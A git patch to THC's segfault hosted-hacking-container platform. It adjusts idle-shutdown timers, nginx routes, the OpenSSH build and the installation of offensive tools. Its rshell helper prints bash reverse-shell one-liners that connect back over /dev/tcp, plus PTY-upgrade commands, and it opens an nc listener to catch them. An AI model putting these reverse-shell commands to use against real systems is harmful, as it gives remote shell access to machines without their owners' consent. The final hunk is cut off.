From 44f0018fff4c2792914152a479bf6b74d837ca67 Mon Sep 17 00:00:00 2001 From: SkyperTHC Date: Sat, 20 Jan 2024 20:44:05 +0000 Subject: [PATCH] guest docker bumping --- ChangeLog | 5 +- Makefile | 4 +- config/etc/nginx/nginx-rpc.conf | 20 ++-- config/etc/sf/timers.conf | 6 + docker-compose.yml | 3 +- encfsd/Dockerfile | 2 +- encfsd/destructor.sh | 149 +++---------------------- encfsd/funcs_destructor.sh | 153 ++++++++++++++++++++++++++ guest/Dockerfile | 11 +- guest/fs-root/etc/shellrc | 4 +- guest/fs-root/sf/bin/rshell | 28 ++--- host/Makefile | 27 +++-- host/fs-root/bin/segfaultsh | 18 +-- host/mk_sshd.sh | 12 +- host/sf-sshd.patch | 34 +++--- master/cgi-bin/rpc | 73 ++++++------ master/ready-lg.sh | 4 +- provision/env.example | 8 +- sfbin/funcs.sh | 2 +- sfbin/funcs_admin.sh | 15 ++- sfbin/{funcs_vpn.sh => funcs_ovpn.sh} | 10 +- 21 files changed, 324 insertions(+), 264 deletions(-) create mode 100644 config/etc/sf/timers.conf create mode 100755 encfsd/funcs_destructor.sh rename sfbin/{funcs_vpn.sh => funcs_ovpn.sh} (99%) diff --git a/ChangeLog b/ChangeLog index 2b699ea..02856bb 100644 --- a/ChangeLog +++ b/ChangeLog @@ -1,7 +1,10 @@ 0.5.4 - 2023-02-00 + * OpenSSH 9.6p1 * rshell * sploitscan - * OpenVPN (curl sf/vpn) + * OpenVPN (curl sf/ovpn) + * Different auto-shutdown timers for FREE and TOKEN users + * Syscop login message after auto-shutdown 0.5.2 - 2023-12-00 * Kali 2023.4 diff --git a/Makefile b/Makefile index 0184105..76529c9 100644 --- a/Makefile +++ b/Makefile @@ -119,6 +119,7 @@ FILES_PROVISION += "segfault-$(VER)/provision/update.sh" FILES_ENCFSD += "segfault-$(VER)/encfsd/Makefile" FILES_ENCFSD += "segfault-$(VER)/encfsd/Dockerfile" FILES_ENCFSD += "segfault-$(VER)/encfsd/destructor.sh" +FILES_ENCFSD += "segfault-$(VER)/encfsd/funcs_destructor.sh" FILES_ENCFSD += "segfault-$(VER)/encfsd/encfsd.sh" FILES_ENCFSD += "segfault-$(VER)/encfsd/portd.sh" @@ -137,6 +138,7 @@ FILES_GSNC += "segfault-$(VER)/gsnc/sf-gsnc.sh" FILES_CONFIG += "segfault-$(VER)/config/etc/nginx/nginx.conf" FILES_CONFIG += "segfault-$(VER)/config/etc/nginx/nginx-rpc.conf" FILES_CONFIG += "segfault-$(VER)/config/etc/sf/sf.conf" +FILES_CONFIG += "segfault-$(VER)/config/etc/sf/timers.conf" FILES_CONFIG += "segfault-$(VER)/config/etc/redis/redis.conf" FILES_CONFIG += "segfault-$(VER)/config/etc/sf/WARNING---SHARED-BETWEEN-ALL-SERVERS---README.txt" FILES_CONFIG += "segfault-$(VER)/config/etc/resolv.conf" @@ -156,7 +158,7 @@ FILES_ROOT += "segfault-$(VER)/sfbin/funcs.sh" FILES_ROOT += "segfault-$(VER)/sfbin/funcs_redis.sh" FILES_ROOT += "segfault-$(VER)/sfbin/funcs_admin.sh" FILES_ROOT += "segfault-$(VER)/sfbin/funcs_net.sh" -FILES_ROOT += "segfault-$(VER)/sfbin/funcs_vpn.sh" +FILES_ROOT += "segfault-$(VER)/sfbin/funcs_ovpn.sh" FILES_ROOT += "segfault-$(VER)/sfbin/ovpn_up.sh" FILES_ROOT += "segfault-$(VER)/sfbin/sf" FILES_ROOT += "segfault-$(VER)/sfbin/banhammer.sh" diff --git a/config/etc/nginx/nginx-rpc.conf b/config/etc/nginx/nginx-rpc.conf index eaba919..80feb42 100644 --- a/config/etc/nginx/nginx-rpc.conf +++ b/config/etc/nginx/nginx-rpc.conf @@ -69,13 +69,15 @@ http { gzip off; location / { - try_files $uri $uri/ = 404; - rewrite /net /net/; - rewrite /vpn /vpn/; - rewrite /wg /wg/; - rewrite /dmesg /dmesg/; - rewrite /port /port/; - rewrite /set /set/; + #try_files $uri $uri/ = 404; + rewrite ^/net$ /net/ last; + rewrite ^/ovpn$ /ovpn/ last; + rewrite ^/vpn$ /ovpn/ last; + rewrite ^/wg$ /wg/ last; + rewrite ^/dmesg$ /dmesg/ last; + rewrite ^/port$ /port/ last; + rewrite ^/set$ /set/ last; + rewrite ^/vpn/(.*)$ /ovpn/$1 last; location ~* ^/set/.* { fastcgi_param REMOTE_ADDR $remote_addr; @@ -101,11 +103,11 @@ http { fastcgi_param SCRIPT_FILENAME /cgi-bin/rpc; fastcgi_pass unix:/dev/shm/sf/master/fcgiwrap.socket; } - location ~* ^/vpn/.* { + location ~* ^/ovpn/.* { fastcgi_param REMOTE_ADDR $remote_addr; fastcgi_param REQUEST_URI $request_uri; fastcgi_param REQUEST_BODY $request_body; - fastcgi_param FCGI_CMD vpn; + fastcgi_param FCGI_CMD ovpn; fastcgi_param SCRIPT_FILENAME /cgi-bin/rpc; fastcgi_pass unix:/dev/shm/sf/master/fcgiwrap.socket; } diff --git a/config/etc/sf/timers.conf b/config/etc/sf/timers.conf new file mode 100644 index 0000000..89063a3 --- /dev/null +++ b/config/etc/sf/timers.conf @@ -0,0 +1,6 @@ +#SF_TIMEOUT_WITH_SHELL=$((60 * 60 * 36)) +#SF_TIMEOUT_NO_SHELL=$((60 * 60 * 1)) +#SF_TIMEOUT_TOKEN_WITH_SHELL=$((60 * 60 * 24 * 7)) +#SF_TIMEOUT_TOKEN_NO_SHELL=$((60 * 60 * 36)) + + diff --git a/docker-compose.yml b/docker-compose.yml index 4553539..4aa03b7 100644 --- a/docker-compose.yml +++ b/docker-compose.yml @@ -40,7 +40,7 @@ services: devices: - "/dev/fuse:/dev/fuse" volumes: - - "${SF_BASEDIR:-.}/config/db:/config/db:ro" + - "${SF_BASEDIR:-.}/config/db:/config/db:rw" - "${SF_BASEDIR:-.}/config/etc/sf:/config/etc/sf:ro" - "${SF_BASEDIR:-.}/data:/encfs/raw" - "${SF_SHMDIR:-/dev/shm/sf}/encfs-sec:/encfs/sec:shared" @@ -76,6 +76,7 @@ services: - "/dev/fuse:/dev/fuse" volumes: - "${SF_BASEDIR:-.}/config/db:/config/db:ro" + - "${SF_BASEDIR:-.}/config/etc/sf:/config/etc/sf:ro" - "${SF_BASEDIR:-.}/data:/encfs/raw" - "${SF_SHMDIR:-/dev/shm/sf}/self-for-guest:/config/self-for-guest" - "${SF_SHMDIR:-/dev/shm/sf}/encfs-sec:/encfs/sec:shared" diff --git a/encfsd/Dockerfile b/encfsd/Dockerfile index 32763e9..2f8fe2c 100644 --- a/encfsd/Dockerfile +++ b/encfsd/Dockerfile @@ -9,4 +9,4 @@ RUN apk add --no-cache --upgrade \ encfs \ redis \ xfsprogs-extra -COPY destructor.sh encfsd.sh portd.sh / +COPY destructor.sh funcs_destructor.sh encfsd.sh portd.sh / diff --git a/encfsd/destructor.sh b/encfsd/destructor.sh index 76b5959..5ef51da 100755 --- a/encfsd/destructor.sh +++ b/encfsd/destructor.sh @@ -3,149 +3,28 @@ # shellcheck disable=SC1091 # Do not follow source /sf/bin/funcs.sh source /sf/bin/funcs_redis.sh - -SF_TIMEOUT_WITH_SHELL=604800 -SF_TIMEOUT_NO_SHELL=129600 + +# Defaults +SF_TIMEOUT_WITH_SHELL=$((60 * 60 * 36)) +SF_TIMEOUT_NO_SHELL=$((60 * 60 * 1)) +SF_TIMEOUT_TOKEN_WITH_SHELL=$((60 * 60 * 24 * 7)) +SF_TIMEOUT_TOKEN_NO_SHELL=$((60 * 60 * 36)) [[ -n $SF_DEBUG ]] && { - SF_TIMEOUT_WITH_SHELL=180 - SF_TIMEOUT_NO_SHELL=120 -} - -# [LID] <1=encfs> <1=Container> -# Either parameter can be "" to not stop encfs or lg-container -stop_lg() -{ - local is_encfs - local is_container - local lid - local ts_born - lid="$1" - ts_born="$2" - is_encfs="$3" - is_container="$4" - - LOG "$lid" "Stopping [$((NOW - ts_born)) sec]. $5" - - red RPUSH portd:cmd "remport ${lid}" >/dev/null - rm -f "/sf/run/encfsd/user/lg-${lid}" - rm -f "/sf/run/pids/lg-${lid}.pid" - rm -f "/sf/run/ips/lg-${lid}.ip" - rm -rf "/config/self-for-guest/lg-${lid}" - rm -rf "/sf/run/users/lg-${lid}" - - # Kill the OpenVPN process (if running) - docker exec sf-master killall "openvpn-$lid" 2>/dev/null - docker exec sf-master rm -rf "/tmp/lg-$lid" 2>/dev/null - - # Tear down container - [[ -n $is_container ]] && docker stop "lg-$lid" &>/dev/nuill - - # Odd: On cgroup2 the command 'docker top lg-*' shows that encfs is running - # inside the container even that we never moved it into the container's - # Process Namespace. EncFS will also die when the lg- is shut down. - # This is only neede for cgroup1: - [[ -n $is_encfs ]] && { - pkill -SIGTERM -f "^\[encfs-${lid}\]" 2>/dev/null - # Give kernel time to unmount mountpoint - sleep 1 - } - # Do not use 'rm -rf' here as this might still be a mounted drive - # when encfsd is not killed fast enough (failing to delete is acceptable). - rm -f "/encfs/sec/lg-${lid}/THIS-DIRECTORY-IS-NOT-ENCRYPTED--DO-NOT-USE.txt" - rmdir "/encfs/sec/lg-${lid}" -} - -# [lg-$LID] -# Check if lg- is running and -# 1. EncFS died -# 2. Container should be stopped (stale, idle) -check_container() -{ - local c - local lid - local i - local IFS - local fn - local comm - local ts_logout - local ts_born - IFS=$'\n' - - c="$1" - lid="${c#lg-}" - - [[ ${#lid} -ne 10 ]] && return - - ts_born=$(stat -c %Y "/sf/run/encfsd/user/lg-${lid}") || { ERR "[${CDM}${lid}${CN}] run/encfsd/user/lg-* missing?"; return; } - # Skip if EncFS only started recently (zsh not yet started). - [[ $((NOW - ts_born)) -lt 20 ]] && return 0 - - # Check if EncFS is still running. - pgrep -f "^\[encfs-${lid}\]" &>/dev/null || { - # NOTE: On CGROUPv2 the encfs dies when the lg container stops (user called 'halt' or 'docker stop') - stop_lg "$lid" "${ts_born}" "" "lg" "EncFS died..." - return - } - - # ts_logout may not exist (stale) - ts_logout=0 - fn="/config/db/user/lg-${lid}/ts_logout" - [[ -f "$fn" ]] && ts_logout=$(stat -c %Y "$fn") - - # Check if there is still a shell running inside the container: - IFS="" - set -o pipefail - comm=$(docker top "lg-${lid}" -eo pid,comm 2>/dev/null | tail +2 | awk '{print $2;}') || { - # HERE: lg died or top failed. - set +o pipefail - stop_lg "${lid}" "${ts_born}" "encfs" "lg" "LG no longer running." - return - } - set +o pipefail - # Note: We must set 'set +o pipefail' (e.g. fail only if last command errors). Otherwise the rare - # condition can happen where grep exits (first match found) but 'echo' is still writing. Then echo - # will receive a SIGPIPE and exit with 141 and the entire pipe will fail. - - # [[ -f "/config/db/user/lg-${lid}/is_logged_in" ]] && return - # FIXME: many stale is_logged_in exists without ssh connected ;/ - - # HERE: LG & EncFS are running. - echo "$comm" | grep -m1 -E '(^zsh$|^bash$|^sh$|^sftp-server$)' >/dev/null && { - # HERE: User still has shell running - [[ -f "/config/db/user/lg-${lid}/is_logged_in" ]] && return - [[ $((NOW - ts_logout)) -lt ${SF_TIMEOUT_WITH_SHELL} ]] && return - # HERE: Not logged in. logged out more than 1 week ago. - - stop_lg "${lid}" "${ts_born}" "encfs" "lg" "Not logged in for $((NOW - ts_logout))sec (shell running)." - return - } - # HERE: No shell running, ts_logout=0 if never logged out - - # Skip if only recently logged out. - [[ $((NOW - ts_logout)) -lt 60 ]] && return # Recently logged out. - - # Filter out stale processes - echo "$comm" | grep -m1 -v -E '(^docker-init$|^sleep$|^encfs$|^gpg-agent$)' >/dev/null || { - # HERE: Nothing running but stale processes - stop_lg "${lid}" "${ts_born}" "encfs" "lg" "No processes running." - return - } - # HERE: Something running (but no shell, and no known processes) - - [[ $((NOW - ts_logout)) -ge ${SF_TIMEOUT_NO_SHELL} ]] && { - # User logged out 1.5 days ago. No shell. No known processes. - stop_lg "${lid}" "${ts_born}" "encfs" "lg" "Not logged in for ${SF_TIMEOUT_NO_SHELL}sec (no shell running)." - return - } - - # HERE: No shell. No known processes. Less than 1.5 days ago. + SF_TIMEOUT_WITH_SHELL=60 + SF_TIMEOUT_NO_SHELL=15 + SF_TIMEOUT_TOKEN_WITH_SHELL=120 + SF_TIMEOUT_TOKEN_NO_SHELL=90 } [[ ! -S /var/run/docker.sock ]] && ERREXIT 255 "Not found: /var/run/docker.sock" +source /funcs_destructor.sh || ERREXIT 255 + export REDISCLI_AUTH="${SF_REDIS_AUTH}" while :; do sleep 30 + source /config/etc/sf/timers.conf 2>/dev/null + source /funcs_destructor.sh 2>/dev/null NOW=$(date +%s) # Every 30 seconds check all container we are tracking (from encfsd) containers=($(cd /sf/run/encfsd/user && echo lg-*)) diff --git a/encfsd/funcs_destructor.sh b/encfsd/funcs_destructor.sh new file mode 100755 index 0000000..a94ba8a --- /dev/null +++ b/encfsd/funcs_destructor.sh @@ -0,0 +1,153 @@ + +# [LID] <1=encfs> <1=Container> +# Either parameter can be "" to not stop encfs or lg-container +stop_lg() +{ + local is_encfs + local is_container + local lid + local ts_born + lid="$1" + ts_born="$2" + is_encfs="$3" + is_container="$4" + + LOG "$lid" "Stopping [$((NOW - ts_born)) sec]. $5" + + red RPUSH portd:cmd "remport ${lid}" >/dev/null + rm -f "/sf/run/encfsd/user/lg-${lid}" + rm -f "/sf/run/pids/lg-${lid}.pid" + rm -f "/sf/run/ips/lg-${lid}.ip" + rm -rf "/config/self-for-guest/lg-${lid}" + rm -rf "/sf/run/users/lg-${lid}" + + # Kill the OpenVPN process (if running) + docker exec sf-master killall "openvpn-$lid" 2>/dev/null + docker exec sf-master rm -rf "/tmp/lg-$lid" 2>/dev/null + + # Tear down container + [[ -n $is_container ]] && docker stop "lg-$lid" &>/dev/nuill + + # Odd: On cgroup2 the command 'docker top lg-*' shows that encfs is running + # inside the container even that we never moved it into the container's + # Process Namespace. EncFS will also die when the lg- is shut down. + # This is only neede for cgroup1: + [[ -n $is_encfs ]] && { + pkill -SIGTERM -f "^\[encfs-${lid}\]" 2>/dev/null + # Give kernel time to unmount mountpoint + sleep 1 + } + # Do not use 'rm -rf' here as this might still be a mounted drive + # when encfsd is not killed fast enough (failing to delete is acceptable). + rm -f "/encfs/sec/lg-${lid}/THIS-DIRECTORY-IS-NOT-ENCRYPTED--DO-NOT-USE.txt" + rmdir "/encfs/sec/lg-${lid}" +} + +try_syscop_msg() { + local lid="$1" + echo -en "\ +🤷‍♂️ ${CDM}Your server shut down automatically because you did not log in for $(( (NOW - ts_logout) / 60 / 60 )) h. +🫵 Please type ${CDC}halt${CDM} to stop your server or... +❤️ ...get a ${CM}TOKEN${CDM} to stop this message: ${CUL}${CB}https://thc.org/sf/token${CN}${CDM} + +🌈 ${CW}Yours sincerely, The SysCops 😘 ${CN} +">"/config/db/user/lg-${lid:?}/syscop-msg.txt" +} + +# [lg-$LID] +# Check if lg- is running and +# 1. EncFS died +# 2. Container should be stopped (stale, idle) +check_container() +{ + local c + local lid + local IFS=$'\n' + local fn + local comm + local ts_logout + local ts_born + local to_with_shell=$SF_TIMEOUT_WITH_SHELL + local to_no_shell=$SF_TIMEOUT_NO_SHELL + local is_token + + c="$1" + lid="${c#lg-}" + + [[ ${#lid} -ne 10 ]] && return + + ts_born=$(stat -c %Y "/sf/run/encfsd/user/lg-${lid}") || { ERR "[${CDM}${lid}${CN}] run/encfsd/user/lg-* missing?"; return; } + # Skip if EncFS only started recently (zsh not yet started). + [[ $((NOW - ts_born)) -lt 20 ]] && return 0 + + # Check if EncFS is still running. + pgrep -f "^\[encfs-${lid}\]" &>/dev/null || { + # NOTE: On CGROUPv2 the encfs dies when the lg container stops (user called 'halt' or 'docker stop') + stop_lg "$lid" "${ts_born}" "" "lg" "EncFS died..." + return + } + + # ts_logout may not exist (stale) + ts_logout=0 + fn="/config/db/user/lg-${lid}/ts_logout" + [[ -f "$fn" ]] && ts_logout=$(stat -c %Y "$fn") + + # Check if there is still a shell running inside the container: + IFS="" + set -o pipefail + comm=$(docker top "lg-${lid}" -eo pid,comm 2>/dev/null | tail +2 | awk '{print $2;}') || { + # HERE: lg died or top failed. + set +o pipefail + stop_lg "${lid}" "${ts_born}" "encfs" "lg" "LG no longer running." + return + } + + # Load timers + [[ -e "/config/db/user/lg-${lid}/token" ]] && { + to_with_shell=$SF_TIMEOUT_TOKEN_WITH_SHELL + to_no_shell=$SF_TIMEOUT_TOKEN_NO_SHELL + is_token=1 + } + set +o pipefail + # Note: We must set 'set +o pipefail' (e.g. fail only if last command errors). Otherwise the rare + # condition can happen where grep exits (first match found) but 'echo' is still writing. Then echo + # will receive a SIGPIPE and exit with 141 and the entire pipe will fail. + + # [[ -f "/config/db/user/lg-${lid}/is_logged_in" ]] && return + # FIXME: many stale is_logged_in exists without ssh connected ;/ + + # HERE: LG & EncFS are running. + echo "$comm" | grep -m1 -E '(^zsh$|^bash$|^sh$|^sftp-server$)' >/dev/null && { + # HERE: User still has shell running + [[ -f "/config/db/user/lg-${lid}/is_logged_in" ]] && return + [[ $((NOW - ts_logout)) -lt ${to_with_shell} ]] && return + # HERE: Not logged in. logged out more than 1 week ago. + stop_lg "${lid}" "${ts_born}" "encfs" "lg" "Not logged in for $((NOW - ts_logout))sec (shell running)." + [[ -z $is_token ]] && try_syscop_msg "$lid" + + return + } + # HERE: No shell running, ts_logout=0 if never logged out + + # Skip if only recently logged out. + [[ $((NOW - ts_logout)) -lt 60 ]] && return # Recently logged out. + + # Filter out stale processes + echo "$comm" | grep -m1 -v -E '(^docker-init$|^sleep$|^encfs$|^gpg-agent$)' >/dev/null || { + # HERE: Nothing running but stale processes + stop_lg "${lid}" "${ts_born}" "encfs" "lg" "No processes running." + return + } + # HERE: Something running (but no shell, and no known processes) + + [[ $((NOW - ts_logout)) -ge ${to_no_shell} ]] && { + # User logged out 1.5 days ago. No shell. No known processes. + + stop_lg "${lid}" "${ts_born}" "encfs" "lg" "Not logged in for ${to_no_shell}sec (no shell running)." + [[ -z $is_token ]] && try_syscop_msg "$lid" + + return + } + + # HERE: No shell. No known processes. Less than 1.5 days ago. +} diff --git a/guest/Dockerfile b/guest/Dockerfile index 0cab665..4bf8d73 100644 --- a/guest/Dockerfile +++ b/guest/Dockerfile @@ -614,11 +614,11 @@ RUN /pkg-install.sh HACK ghbin shadow1ng/fscan 'fscan%arch:x86_64=:aarch64=_arm6 && /pkg-install.sh HACK ghbin 'theaog/spirit' 'spirit%arch:x86_64=:DEFAULT=SKIP%.tgz$' spirit `# x86_64 only, spirit-arm bad` \ && /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/tomnomnom/gf@latest \ && mkdir -p /usr/share/gf \ - && svn export https://github.com/tomnomnom/gf/trunk /tmp/gf \ + && git clone --depth 1 https://github.com/tomnomnom/gf.git /tmp/gf \ && mv /tmp/gf/examples/*.json /usr/share/gf \ && mv /tmp/gf/gf-completion.* /usr/share/gf \ && rm -rf /tmp/gf \ - && svn export https://github.com/1ndianl33t/Gf-Patterns/trunk/ /tmp/gf \ + && git clone --depth 1 https://github.com/1ndianl33t/Gf-Patterns.git /tmp/gf \ && mv /tmp/gf/*.json /usr/share/gf; }' \ && /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/tomnomnom/hacks/inscope@latest; }' \ && /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/Emoe/kxss@latest; }' \ @@ -631,7 +631,8 @@ RUN /pkg-install.sh HACK ghbin shadow1ng/fscan 'fscan%arch:x86_64=:aarch64=_arm6 && cmake . \ && make \ && cp urldedupe /usr/bin; }' \ - && /pkg-install.sh HACK bash -c '{ svn export https://github.com/urbanadventurer/username-anarchy/trunk /opt/username-anarchy; }' \ + && /pkg-install.sh HACK bash -c '{ git clone --depth 1 https://github.com/urbanadventurer/username-anarchy.git /opt/username-anarchy \ + && rm -rf /opt/username-anarchy/.git*; }' \ && /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/damit5/gitdorks_go@latest; }' \ && /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/trickest/dsieve@master; }' \ && /pkg-install.sh HACK bash -c '{ GOBIN=/usr/bin go install github.com/trickest/enumerepo@latest; }' \ @@ -802,8 +803,8 @@ RUN /pkg-install.sh HACK ghbin ekzhang/bore '%arch:aarch64=arm%-unknown-linux' && /pkg-install.sh HACK bin 'https://github.com/RustScan/RustScan/releases/download/2.0.1/rustscan_2.0.1_amd64.deb' `# x86_64 only` \ && /pkg-install.sh HACK bin 'https://github.com/xaitax/SploitScan/raw/main/sploitscan.py' sploitscan \ && /pkg-install.sh HACK ghbin hueristiq/xurlfind3r 'linux_%arch:x86_64=amd64:aarch64=arm64%' xurlfind3r -RUN /pkg-install.sh LARGE ghbin PaddiM8/kalker 'linux' kalker \ - && /pkg-install.sh LARGE ghbin PowerShell/PowerShell 'deb_%arch1%.deb' +RUN /pkg-install.sh LARGE ghbin PaddiM8/kalker 'linux' kalker + ## YANKED. Already in apt-get install powershell/pkg-install.sh LARGE ghbin PowerShell/PowerShell 'deb_%arch1%.deb' RUN /pkg-install.sh HACK bash -c '{ wget -O "/usr/bin/favfreak.py" https://raw.githubusercontent.com/devanshbatham/FavFreak/master/favfreak.py \ && chmod 755 /usr/bin/favfreak.py \ && ln -s favfreak.py /usr/bin/FavFreak; }' \ diff --git a/guest/fs-root/etc/shellrc b/guest/fs-root/etc/shellrc index 89fa2f0..3f3969f 100644 --- a/guest/fs-root/etc/shellrc +++ b/guest/fs-root/etc/shellrc @@ -293,8 +293,10 @@ alias nocol=noansi # Make the Project name visibile in the PS1 prompt [[ -z $VIRTUAL_ENV ]] && VIRTUAL_ENV="${SF_PRJ}" -PATH="${HOME:-/sec/root}/go/bin:${HOME:-/sec/root}/.cargo/bin:/sec/root/.local/bin:/sec/usr/sbin:/sec/usr/bin:/sf/bin:$PATH" + +PATH="${HOME:-/sec/root}/go/bin:${HOME:-/sec/root}/.cargo/bin:/sec/root/.local/bin:/sec/usr/sbin:/sec/usr/bin:/sf/bin:/usr/local/go/bin:$PATH" [[ -d /usr/share/doc/python3-impacket/examples ]] && PATH="${PATH}:/usr/share/doc/python3-impacket/examples" +export PATH _sf_info_non_perm() { diff --git a/guest/fs-root/sf/bin/rshell b/guest/fs-root/sf/bin/rshell index 29d0870..43f6d72 100755 --- a/guest/fs-root/sf/bin/rshell +++ b/guest/fs-root/sf/bin/rshell @@ -16,31 +16,31 @@ ERREXIT() { exit "${code:-99}" } +[[ ! -f /config/self/reverse_port ]] && curl sf/port load rport /config/self/reverse_port || ERREXIT 255 "No reverse port found. Try ${CC}curl sf/port${CN}." load rip /config/self/reverse_ip || ERREXIT 255 "No reverse port found. Try ${CC}curl sf/port${CN}." echo -e "\ -Use any of these commands on the remote system:${CDR} - bash -c '(exec bash -i &>/dev/tcp/${rip}/${rport} 0>&1) &' - (bash -i &>/dev/tcp/${rip}/${rport} 0>&1) & -${CN} -Once connected, cut & paste this into the remote shell:${CDC} +Use one of these commands on the remote system: + 1. ${CDR}bash -c '(exec bash -i &>/dev/tcp/${rip}/${rport} 0>&1) &'${CN} + 2. ${CDR}(bash -i &>/dev/tcp/${rip}/${rport} 0>&1) &${CN} +${CN}Once connected, cut & paste the following into the _this_ shell: +${CF}-------------------------------------------------------------------------------${CDC} command -v python >/dev/null \\ - && exec python -c 'import pty; pty.spawn(\"bash\")' \\ - || exec script -qc bash /dev/null - -export SHELL=/bin/bash -export TERM=xterm-256color + && exec python -c 'import pty; pty.spawn(\"bash\")' \\ + || exec script -qc bash /dev/null +export SHELL=/bin/bash TERM=xterm-256color reset -I PS1='"'\[\\033[36m\]\\u\[\\033[m\]@\[\\033[32m\]\\h:\[\\033[33;1m\]\\w\[\\033[m\]\\$ '"' "'stty -echo;printf "\\033[18t";read -rdt R;stty sane $(echo "$R"|awk -F";" '"'"'{ printf "rows "$3" cols "$2; }'"'"')'" -${CN}To force-exit this shell, type ${CDY}kill \"\$(pgrep -P $$)\"${CN} ------------------------------------" +${CN}${CF}-------------------------------------------------------------------------------${CN} +To force-exit this listener, type ${CDY}kill \"\$(pgrep -P $$)\"${CN} on your Root Server" # PS1='USERS=$(who | wc -l) LOAD=$(cut -f1 -d" " /proc/loadavg) PS=$(ps -e --no-headers|wc -l) \[\e[36m\]\u\[\e[m\]@\[\e[32m\]\h:\[\e[33;1m\]\w \[\e[0;31m\]\$\[\e[m\] ' cfg=$(stty --save) stty raw -echo opost -time nc -vnlp "$rport" -echo "Restoring TTY" +echo -e "${CDG}Listening on ${CG}${rip}:${rport}${CN}" +nc -nlp "$rport" +echo "🦋 Restoring terminal..." stty "$cfg" # reset -I diff --git a/host/Makefile b/host/Makefile index 07e14d6..4d6f1f6 100644 --- a/host/Makefile +++ b/host/Makefile @@ -1,29 +1,34 @@ + +VER=9.6p1 + all: albuild fs-root/bin/docker-exec-sigproxy fs-root/bin/unix-socket-client fs-root/usr/sbin/sshd Dockerfile docker build --no-cache --network host -t sf-host . albuild: - bash -c "docker run --rm alpine-gcc true || \ - docker commit alpine-gcc alpine-gcc || { \ - docker run --network host --name alpine-gcc alpine sh -c 'apk update && apk add gcc patch libc-dev musl-dev zlib-dev openssl-dev make linux-headers libcap-dev bash' \ - && docker commit alpine-gcc alpine-gcc; }" + bash -c "docker run --rm sf-alpine-gcc true || \ + docker commit sf-alpine-gcc sf-alpine-gcc || { \ + docker run --network host --name sf-alpine-gcc alpine sh -c 'apk update && apk add gcc patch libc-dev musl-dev zlib-dev openssl-dev make linux-headers libcap-dev bash' \ + && docker commit sf-alpine-gcc sf-alpine-gcc; }" # See mk_sshd.sh for manual debugging -fs-root/usr/sbin/sshd: sf-sshd.patch mk_sshd.sh - docker run --rm -v$$(pwd):/src --net=host -w /tmp alpine-gcc /src/mk_sshd.sh +fs-root/usr/sbin/sshd: albuild sf-sshd.patch mk_sshd.sh + docker run --rm -v$$(pwd):/src --net=host -w /tmp --env VER=$(VER) sf-alpine-gcc /src/mk_sshd.sh + @echo "Type 'make diff' to create a sf-sshd-$(VER).patch" fs-root/bin/docker-exec-sigproxy: docker-exec-sigproxy.c - docker run --rm -v$$(pwd):/src -w /src alpine-gcc gcc -Wall -O2 -o fs-root/bin/docker-exec-sigproxy docker-exec-sigproxy.c + docker run --rm -v$$(pwd):/src -w /src sf-alpine-gcc gcc -Wall -O2 -o fs-root/bin/docker-exec-sigproxy docker-exec-sigproxy.c @echo SUCCESS fs-root/bin/unix-socket-client: unix-socket-client.c - docker run --rm -v$$(pwd):/src -w /src alpine-gcc gcc -Wall -O2 -o fs-root/bin/unix-socket-client unix-socket-client.c + docker run --rm -v$$(pwd):/src -w /src sf-alpine-gcc gcc -Wall -O2 -o fs-root/bin/unix-socket-client unix-socket-client.c @echo SUCCESS diff: cd dev && \ - diff -x '!*.[ch]' -u openssh-9.2p1-orig/ openssh-9.2p1-sf/ | grep -Ev ^"(Only in|Common)" >../sf-sshd.patch + diff -x '!*.[ch]' -u openssh-$(VER)-orig/ openssh-$(VER)-sf/ | grep -Ev ^"(Only in|Common)" >../sf-sshd-$(VER).patch + @echo "May want to 'mv sf-sshd-$(VER).patch sf-sshd.patch'." clean: - rm -rf openssh-9.2p1-sf fs-root/usr/sbin/sshd - docker image rm alpine-gcc + rm -rf openssh-$(VER)-orig openssh-$(VER)-sf fs-root/usr/sbin/sshd + docker image rm sf-alpine-gcc diff --git a/host/fs-root/bin/segfaultsh b/host/fs-root/bin/segfaultsh index e8c7f83..7df4ee0 100755 --- a/host/fs-root/bin/segfaultsh +++ b/host/fs-root/bin/segfaultsh @@ -424,7 +424,7 @@ print_goodbye() # Restricted shell (-r) wont let us redirect stderr - use a bash-exec trick # Note: pgrep is executed in user's context. Treat the output with care and do not trust it. - n=$(bash -c "exec docker exec --user 0:0 \"lg-${LID}\" pgrep -c . 2>/dev/null" | head -n1) + n=$(timeout 2 bash -c "exec docker exec --user 0:0 \"lg-${LID}\" pgrep -c . 2>/dev/null" | head -n1) [[ -z "$n" ]] && n=0 [[ ${#n} -gt 5 ]] && n=0 [[ ! $n -eq $n ]] && n=0 @@ -435,7 +435,7 @@ print_goodbye() str="process is" [[ "$n" -gt 1 ]] && str="processes are" echo -e "${CY}WARNING: ${CR}${n}${CY} ${str} still running:${CN}" - exec_errnull docker exec --user 0:0 "lg-${LID}" pgrep . -al | tail -n+3 | while read -r x; do p="${x%% *} "; n="${x#* }"; echo -e "${CDY}--> ${CDR}${p:0:8}${CDG}${n:0:68}${CN}"; done + exec_errnull timeout 2 docker exec --user 0:0 "lg-${LID}" pgrep . -al | tail -n+3 | while read -r x; do p="${x%% *} "; n="${x#* }"; echo -e "${CDY}--> ${CDR}${p:0:8}${CDG}${n:0:68}${CN}"; done echo -e "\ -------> The encrypted filesystem in /sec will remain accessible until -------> the last shell exits or all background processes terminate. @@ -443,16 +443,6 @@ print_goodbye() -------> This will also make /sec unavailabe until your next log in." fi echo -en "\r" - [[ -z $SF_IS_PAYING ]] && { - echo -e "\ -${CDY}@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ -@@@ ${CDG}** GET MORE MEMORY, SPEED, STORAGE AND NO RESTRICTIONS **${CDY} @@@ -@@@ ${CDR}${CUL}https://www.thc.org/segfault/free${CN}${CDY} @@@ -@@@ ${CB}${CUL}https://www.thc.org/segfault/upgrade${CN}${CDY} @@@ -@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@${CN}" - - } - sysmsg "/config/host/etc/logoutmsg-all.sh" echo -e "\ @@ -536,7 +526,7 @@ spawn_shell_exit() tofile "${YOUR_IP:?}" "${SF_RUN_DIR}/ips/lg-${LID}.ip" [[ 